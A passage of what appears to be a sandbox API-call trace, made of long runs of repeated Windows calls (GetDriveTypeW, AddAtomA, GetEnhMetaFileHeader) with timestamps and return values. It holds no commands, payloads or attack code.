(lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) 
returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) 
returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | 
out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, 